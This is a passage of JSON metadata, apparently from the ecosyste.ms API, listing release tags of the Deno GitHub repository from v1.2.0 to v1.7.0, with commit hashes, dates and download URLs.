/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"